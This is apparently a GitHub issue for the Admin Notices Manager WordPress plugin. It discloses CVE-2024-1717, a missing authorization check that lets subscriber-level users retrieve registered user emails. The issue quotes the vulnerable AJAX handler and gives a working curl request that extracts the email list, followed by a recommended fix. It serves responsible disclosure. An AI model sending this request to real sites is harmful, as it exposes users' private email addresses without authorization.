search

Melapress / admin-notices-manager

Admin notices manager is a WordPress plugin that allows you to better manage the admin notices in the WordPress dashboard so you read them at your own convenience and never miss an important message.
https://www.wpwhitesecurity.com/wordpress-plugins/admin-notices-manager/
Other
0 stars 0 forks source link

<= 1.4.0 - Missing Authorization to Authenticated (Subscriber+) User Email Retrieval #96

Closed robert81 closed 3 months ago

robert81 commented 3 months ago

Vulnerability Report

Vulnerability Title: Admin Notices Manager <= 1.4.0 - Missing Authorization to Authenticated (Subscriber+) User Email Retrieval CVE ID: CVE-2024-1717 CVSS Severity Score: 4.3 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Organization: Wordfence Vulnerability Researcher(s): Lucio Sá Software Link(s): https://wordpress.org/plugins/admin-notices-manager

Description The Admin Notices Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_ajax_call() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve a list of registered user emails.

Proof of Concept It happens because of the "select2-wpwhitesecurity" vendor package that has an outdated version:


/**

* Handles AJAX requests from the autocomplete controls.

*/

public static function handle_ajax_call() {

// TODO verify nonce

// Check the 'entity' parameter.

if ( ! array_key_exists( 'entity', $_REQUEST ) ) {

wp_send_json_error( 'Data type not defined.' );

}

if ( ! array_key_exists( 'term', $_REQUEST ) ) {

wp_send_json_error( 'Search term is missing.' );

}

$result = array();

$entity = sanitize_text_field( wp_unslash( trim( $_REQUEST['entity'] ) ) );

$search_term = sanitize_text_field( wp_unslash( trim( $_REQUEST['term'] ) ) );

switch ( $entity ) {

case 'user':

$result = self::get_users( $search_term );

break;

case 'post':

$result = self::get_posts( $search_term );

break;

default:

wp_send_json_error( 'Unsupported data type.' );

}

echo wp_json_encode(

array(

'results' => $result,

)

);

die();

}

Send the cURL below to get the emails:

curl --request POST \ --url http://site_url/wp-admin/admin-ajax.php \ --header 'Content-Type: multipart/form-data' \ --header 'Cookie: COOKIE' --form action=wpws_s24wp \ --form entity=user \ --form term=

You can use the "term" field to filter the results.

Any Known Public References https://plugins.trac.wordpress.org/browser/admin-notices-manager/trunk/vendor/wpwhitesecurity/select2-wpwhitesecurity/load.php#L58

Recommended Solution We recommend adding a capability check as well as nonce validation to the handle_ajax_call function, or hide sensitive data from non-privileged users.

sdobreff commented 3 months ago

/cib

create-issue-branch[bot] commented 3 months ago

Branch issue-96-_=_1_40-_Missing_Authorization_to_Authenticated_Subscriber+_User_Email_Retrieval created!